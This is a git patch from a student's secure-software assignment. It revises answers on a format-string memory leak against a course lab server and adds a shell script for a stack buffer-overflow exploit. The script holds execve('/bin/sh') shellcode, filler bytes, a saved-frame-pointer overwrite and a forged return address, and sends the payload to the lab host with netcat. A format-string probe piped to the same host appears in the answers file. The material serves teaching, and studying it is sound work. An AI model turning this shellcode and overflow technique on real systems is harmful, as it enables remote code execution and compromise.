From c333677b7ac94a5ff1f90c486c243b0cfa371a17 Mon Sep 17 00:00:00 2001
From: Mart Lubbers
Date: Thu, 12 Mar 2015 12:48:08 +0100
Subject: [PATCH] poging

---
 .../exercise2 | 27 ++++++++-----------
 .../exercise2e.sh | 14 ++++++++++
 2 files changed, 25 insertions(+), 16 deletions(-)
 create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index 95b7f60..9c98cf3 100644
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -1,12 +1,14 @@
-a. The buffer is 104 characters long. When you input 105 a's the last a will
-be garbled.
+a)
+The buffer is probably 104 characters wide. All characters over 104 will not be
+echoed.
 
-b. "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx"
-The memory outputted is this:
-7ffff7ff805b
+b,c)
+printf "%20s\n" | sed 's/ /%lx /g' | nc hackme.cs.ru.nl 2266
+
+Memory:
+7ffff7ff8050
 7ffff7dd8de0
 fbad2088
-786c2520786c2520
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
@@ -19,15 +21,8 @@ fbad2088
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
-786c25
-1
+7fffffffeb00 saved frame pointer
+4004c1 return address
+1 return value
 7fffffffeb30
 7fffffffebc0
-4006a9
-0
-100400530
-
-c. Frame pointer: 7fffffffeb30 or 7fffffffebc0
- return address: 4006a9
-
-d. 17 words of 8 bytes therefore 136
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
new file mode 100644
index 0000000..38ea879
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
@@ -0,0 +1,14 @@
+# Buffer is 104 bytes
+# Shell code is 30 bytes so we need to fill 73 bytes
+# Then we need to skip the sfp and fix the return address to our address
+
+#fillers=$(printf "%73s")
+#fillers="a\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
+fillers="\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
+shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+sfpfiller="\x01\x01\x01\x01\x01\x01"
+# Return value is
+# 0x7ffff7dd8de0 - 73 = 7ffff7dd8e29 -
+# The buffer
+returnvalue="\x7f\xff\xf7\xdd\xeb\x30"
+cat <(echo -e "${fillers}${shellcode}${sfpfiller}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
-- 
2.20.1